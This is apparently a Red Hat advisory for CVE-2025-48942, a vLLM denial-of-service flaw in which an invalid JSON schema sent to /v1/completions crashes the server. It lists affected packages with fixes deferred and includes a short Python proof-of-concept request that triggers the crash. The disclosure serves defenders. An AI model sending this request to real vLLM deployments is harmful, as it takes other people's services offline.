Description
vLLM is an inference and serving engine for large language models (LLMs). In versions 0.8.0 up to but excluding 0.9.0, hitting the /v1/completions API with an invalid json_schema as a Guided Param kills the vLLM server. This vulnerability is similar to GHSA-9hcf-v7m4-6m2j/CVE-2025-48943, which covers regex instead of a JSON schema. Version 0.9.0 fixes the issue.
A denial of service flaw was found in vLLM. This flaw allows a remote attacker with access to the /v1/completions endpoint to submit an invalid json_schema as a guided param, which will crash the vLLM instance.
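For illustration only, the sketch below shows the shape of such a request against a local test instance, assuming the `guided_json` extra parameter exposed by vLLM's OpenAI-compatible server; the host, port, model name, and the specific invalid schema are assumptions, and this should only ever be run against one's own test deployment.

```python
# Minimal sketch of the request pattern described in this advisory (CVE-2025-48942).
# Assumptions: a vLLM 0.8.x OpenAI-compatible server on localhost:8000 and a
# hypothetical model name; run only against your own test instance.
import requests

payload = {
    "model": "my-test-model",   # hypothetical model name
    "prompt": "Say hello",
    "max_tokens": 16,
    # vLLM guided-decoding extra parameter; an invalid schema here
    # (e.g. an unknown "type") is what the advisory says crashes 0.8.x servers.
    "guided_json": {"type": "object", "properties": {"x": {"type": "not-a-real-type"}}},
}

resp = requests.post("http://localhost:8000/v1/completions", json=payload, timeout=30)
print(resp.status_code, resp.text)
```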
Statement
The severity of this vulnerability is rated Moderate because it does not affect the availability of the underlying system. The effects are confined to the application layer: the vLLM service can be crashed, but the stability of the host system is not compromised.
Mitigation
Mitigation for this issue is either not available, or the currently available options do not meet the Red Hat Product Security criteria of ease of use and deployment, applicability to a widespread installation base, or stability.
Affected packages
Platform | Package | State | Errata | Release
---|---|---|---|---
Red Hat AI Inference Server | rhaiis/vllm-cuda-rhel9 | Fix deferred | |
Red Hat AI Inference Server | rhaiis/vllm-rocm-rhel9 | Fix deferred | |
Red Hat Enterprise Linux AI (RHEL AI) | rhelai1/bootc-amd-rhel9 | Fix deferred | |
Red Hat Enterprise Linux AI (RHEL AI) | rhelai1/bootc-aws-nvidia-rhel9 | Fix deferred | |
Red Hat Enterprise Linux AI (RHEL AI) | rhelai1/bootc-azure-amd-rhel9 | Fix deferred | |
Red Hat Enterprise Linux AI (RHEL AI) | rhelai1/bootc-azure-nvidia-rhel9 | Fix deferred | |
Red Hat Enterprise Linux AI (RHEL AI) | rhelai1/bootc-gcp-nvidia-rhel9 | Fix deferred | |
Red Hat Enterprise Linux AI (RHEL AI) | rhelai1/bootc-intel-rhel9 | Fix deferred | |
Red Hat Enterprise Linux AI (RHEL AI) | rhelai1/bootc-nvidia-rhel9 | Fix deferred | |
Red Hat Enterprise Linux AI (RHEL AI) | rhelai1/instructlab-amd-rhel9 | Fix deferred | |
Additional information
Status:
CVSS3: 4.3 (Medium)
Related vulnerabilities
vLLM DOS: Remotely kill vllm over http with invalid JSON schema